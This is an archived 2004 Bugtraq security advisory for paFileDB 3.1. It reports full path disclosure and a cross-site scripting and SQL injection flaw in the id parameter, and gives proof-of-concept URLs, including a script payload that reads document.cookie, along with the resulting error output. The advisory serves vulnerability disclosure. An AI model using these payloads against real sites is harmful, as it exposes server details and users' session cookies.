| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 27 Apr 2004 21:41:04 +0200
From: "k1LL3r B0y" <k1ll3rb0y@...mail.com>
To: bugtraq@...urityfocus.com, info@...uriteam.com,
submissions@...ketstormsecurity.org,
full-disclosure-admin@...ts.netsys.com
Subject: Multiple vulnerabilities paFileDB
Advisory: http://bichosoft.webcindario.com/advisory-04.txt
#########################################################################
###################### :.: DarkBicho :.: ################################
# #
# PROGRAM: paFileDB #
# VERSION: 3.1 #
# URL: http://www.phparena.net #
# BUG: Multiple vulnerabilities #
# DATE: 27/04/2004 #
# AUTHOR: DarkBicho #
# WebSite: http://www.darkbicho.tk #
# Email: darkbicho@...u.com #
# Team: Security Wari Projects <www.swp-zone.org> #
# #
#########################################################################
#########################################################################
1.- Vulnerabilities:
---------------
A. Full path disclosure:
This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive information.
http://site/includes/admin/login.php?formname=DarkBicho&formpass=DarkBicho
&B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do
and we get standard error messages, revealing the full path to the nuke
engine scripting files:
Fatal error: Call to undefined function: locbar() in
/home/site/includes/admin/login.php
on line 12
http://localhost/includes/category.php
http://localhost/includes/search.php
http://localhost/includes/main.php
http://localhost/includes/viewall.php
http://localhost/includes/download.php
http://localhost/includes/email.php
http://localhost/includes/file.php
http://localhost/includes/rate.php
http://localhost/includes/stats.php
2. Cross-Site Scripting aka XSS:
----------------------------
Cross-Site Scripting in id variable:
http://localhost/pafiledb.php?action=category&id='<script>alert(document.cookie);</script>
paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near
'(document.cookie);'' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_cat WHERE
cat_id = '''
3.- SOLUTION:
¨¨¨¨¨¨¨¨
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the Video Gallery website for updates and official release
details.
4.- Greetings:
---------
greetings to my Peruvian group swp and perunderforce :D
"El pisto es y sera peruano"
5.- Contact
-------
WEB: http://www.darkbicho.tk
EMAIL: darkbicho@...u.com
---------------------------------- [ EOF ]
------------------------------------
_________________________________________________________________
MSN Amor: busca tu ½ naranja http://latam.msn.com/amor/
Powered by blists - more mailing lists